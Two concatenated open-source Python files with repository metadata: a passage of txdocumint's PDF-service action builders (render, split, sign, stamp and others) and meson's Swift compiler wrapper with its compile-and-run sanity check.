            u'parameters': params}, _parse_render
def render_legacy_html(input, base_uri=None):
    """
    Render a legacy HTML document to a PDF document.

    :param unicode input: URI to the HTML content to render.
    :param base_uri: Optional base URI to use when resolving relative URIs.
    :type base_uri: unicode or None
    """
    params = {u'input': input}
    if base_uri is not None:
        params[u'base-uri'] = base_uri

    def _parse_render(result):
        # the rendered document URI is the first "result" link
        return result[u'links'][u'result'][0]
    return {u'action': u'render-legacy-html',
            u'parameters': params}, _parse_render
def concatenate(inputs):
    """
    Concatenate several PDF documents together.

    :param inputs: Document URIs.
    :type inputs: list of unicode
    """
    def _parse_concat(result):
        return result[u'links'][u'result'][0]
    action = {u'action': u'concatenate',
              u'parameters': {u'inputs': inputs}}
    return action, _parse_concat
def thumbnails(input, dpi):
    """
    Generate JPEG thumbnails for a PDF document.

    :param unicode input: Document URI.
    :param int dpi: Pixel density of the thumbnail.
    """
    def _parse_thumbnails(result):
        return result[u'links'][u'results']
    return ({u'action': u'thumbnails',
             u'parameters': {u'input': input,
                             u'dpi': dpi}},
            _parse_thumbnails)
def split(input, page_groups):
    """
    Split a PDF document into multiple PDF documents.

    :param unicode input: Document URI.
    :param page_groups: Page number groups; each group of pages represents a
    new document containing only those pages from the original document in
    the order they are specified.  For example ``[[1, 3, 2], [4, 2]]``
    produces two documents: one with pages 1, 3 and 2; the other with pages
    4 and 2.
    :type page_groups: list of lists of int
    """
    params = {u'input': input,
              u'page-groups': page_groups}

    def _parse_split(result):
        return result[u'links'][u'results']
    return {u'action': u'split', u'parameters': params}, _parse_split
def metadata(input):
    """
    Retrieve metadata from a PDF document.

    :param unicode input: Document URI.
    """
    def _parse_metadata(result):
        # metadata comes back in the response body, not as a link
        return result[u'body']
    return ({u'action': u'metadata',
             u'parameters': {u'input': input}},
            _parse_metadata)
def sign(inputs, certificate_alias, location, reason):
    """
    Digitally sign one or more PDF documents.

    :param inputs: Document URIs.
    :type inputs: list of unicode
    :param unicode certificate_alias: Certificate alias, in the Documint
    keystore, to use when signing the documents.
    :param unicode location: Signing location.
    :param unicode reason: Signing reason.
    """
    params = {u'inputs': inputs,
              u'certificate-alias': certificate_alias,
              u'location': location,
              u'reason': reason}

    def _parse_sign(result):
        return result[u'links'][u'results']
    return {u'action': u'sign', u'parameters': params}, _parse_sign
def crush(input, compression_profile):
    """
    Compress a PDF document according to a specific compression profile.

    :param unicode input: Document URI.
    :param unicode compression_profile: Compression profile to use, possible
    choices are: ``text`` (bilevel), ``photo-grey`` (greyscale), ``photo``
    (colour).
    """
    params = {u'input': input,
              u'compression-profile': compression_profile}

    def _parse_crush(result):
        return result[u'links'][u'result'][0]
    return {u'action': u'crush', u'parameters': params}, _parse_crush
def stamp(watermark, inputs):
    """
    Stamp documents with a watermark document.

    :param unicode watermark: Watermark document URI.
    :type inputs: ``List[unicode]``
    :param inputs: Document URIs.
    """
    def _parse_stamps(result):
        return result[u'links'][u'results']
    return ({u'action': u'stamp',
             u'parameters': {u'watermark': watermark,
                             u'inputs': inputs}},
            _parse_stamps)
| {
"content_hash": "7ac0b3cbb61f9d1c8cf58f2797f1547d",
"timestamp": "",
"source": "github",
"line_count": 154,
"max_line_length": 79,
"avg_line_length": 30.636363636363637,
"alnum_prop": 0.622297583721916,
"repo_name": "fusionapp/txdocumint",
"id": "63770344f809e4772dd56f5beeb222b60c24bed8",
"size": "4718",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/txdocumint/actions.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "126104"
}
],
"symlink_target": ""
} |
import subprocess, os.path
from ..mesonlib import EnvironmentException
from .compilers import Compiler, swift_buildtype_args, clike_debug_args
# Compiler flags for each meson optimization level; swiftc only
# distinguishes "optimized" (-O) from "not optimized" here.
swift_optimization_args = {'0': [],
                           'g': [],
                           '1': ['-O'],
                           '2': ['-O'],
                           '3': ['-O'],
                           's': ['-O'],
                           }
class SwiftCompiler(Compiler):
    # Swift compiler abstraction for meson; wraps the LLVM-based swiftc
    # driver.  Cross compilation is not supported (is_cross is False).
    def __init__(self, exelist, version):
        self.language = 'swift'
        super().__init__(exelist, version)
        self.version = version
        self.id = 'llvm'
        self.is_cross = False

    def get_linker_exelist(self):
        # swiftc also drives linking; return a copy so callers may append
        return self.exelist[:]

    def name_string(self):
        return ' '.join(self.exelist)

    def needs_static_linker(self):
        return True

    def get_werror_args(self):
        return ['--fatal-warnings']

    def get_dependency_gen_args(self, outtarget, outfile):
        return ['-emit-dependencies']

    def depfile_for_object(self, objfile):
        # foo.o -> foo.d
        return os.path.splitext(objfile)[0] + '.' + self.get_depfile_suffix()

    def get_depfile_suffix(self):
        return 'd'

    def get_output_args(self, target):
        return ['-o', target]

    def get_linker_output_args(self, target):
        return ['-o', target]

    def get_header_import_args(self, headername):
        # bridge an Objective-C header into Swift
        return ['-import-objc-header', headername]

    def get_warn_args(self, level):
        # warning levels are not mapped for swift
        return []

    def get_buildtype_args(self, buildtype):
        return swift_buildtype_args[buildtype]

    def get_buildtype_linker_args(self, buildtype):
        return []

    def get_std_exe_link_args(self):
        return ['-emit-executable']

    def get_module_args(self, modname):
        return ['-module-name', modname]

    def get_mod_gen_args(self):
        return ['-emit-module']

    def build_rpath_args(self, *args):
        return [] # FIXME

    def get_include_args(self, dirname):
        return ['-I' + dirname]

    def get_compile_only_args(self):
        return ['-c']

    def sanity_check(self, work_dir, environment):
        """Compile and run a trivial program to prove the toolchain works.

        Raises EnvironmentException if compilation fails or the produced
        executable does not run successfully.
        """
        src = 'swifttest.swift'
        source_name = os.path.join(work_dir, src)
        output_name = os.path.join(work_dir, 'swifttest')
        with open(source_name, 'w') as ofile:
            ofile.write('''print("Swift compilation is working.")
''')
        extra_flags = self.get_cross_extra_flags(environment, link=True)
        pc = subprocess.Popen(self.exelist + extra_flags + ['-emit-executable', '-o', output_name, src], cwd=work_dir)
        pc.wait()
        if pc.returncode != 0:
            raise EnvironmentException('Swift compiler %s can not compile programs.' % self.name_string())
        if subprocess.call(output_name) != 0:
            raise EnvironmentException('Executables created by Swift compiler %s are not runnable.' % self.name_string())

    def get_debug_args(self, is_debug):
        return clike_debug_args[is_debug]

    def get_optimization_args(self, optimization_level):
        return swift_optimization_args[optimization_level]
| {
"content_hash": "651d5a467850ce005d26655284c3807e",
"timestamp": "",
"source": "github",
"line_count": 99,
"max_line_length": 121,
"avg_line_length": 31.171717171717173,
"alnum_prop": 0.5832793259883344,
"repo_name": "MathieuDuponchelle/meson",
"id": "4d5dd0cfe2992251ee850d0b4c8f6e7f4eb9fa0a",
"size": "3679",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "mesonbuild/compilers/swift.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Assembly",
"bytes": "4190"
},
{
"name": "Batchfile",
"bytes": "868"
},
{
"name": "C",
"bytes": "146965"
},
{
"name": "C#",
"bytes": "949"
},
{
"name": "C++",
"bytes": "27342"
},
{
"name": "CMake",
"bytes": "1780"
},
{
"name": "D",
"bytes": "5077"
},
{
"name": "Dockerfile",
"bytes": "957"
},
{
"name": "Emacs Lisp",
"bytes": "919"
},
{
"name": "Fortran",
"bytes": "4590"
},
{
"name": "Genie",
"bytes": "341"
},
{
"name": "Inno Setup",
"bytes": "354"
},
{
"name": "Java",
"bytes": "2570"
},
{
"name": "JavaScript",
"bytes": "136"
},
{
"name": "LLVM",
"bytes": "75"
},
{
"name": "Lex",
"bytes": "135"
},
{
"name": "Meson",
"bytes": "341983"
},
{
"name": "Objective-C",
"bytes": "1092"
},
{
"name": "Objective-C++",
"bytes": "332"
},
{
"name": "PowerShell",
"bytes": "2249"
},
{
"name": "Python",
"bytes": "1964481"
},
{
"name": "Roff",
"bytes": "301"
},
{
"name": "Rust",
"bytes": "1079"
},
{
"name": "Shell",
"bytes": "2083"
},
{
"name": "Swift",
"bytes": "1152"
},
{
"name": "Vala",
"bytes": "10025"
},
{
"name": "Verilog",
"bytes": "709"
},
{
"name": "Vim script",
"bytes": "9480"
},
{
"name": "Yacc",
"bytes": "50"
}
],
"symlink_target": ""
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.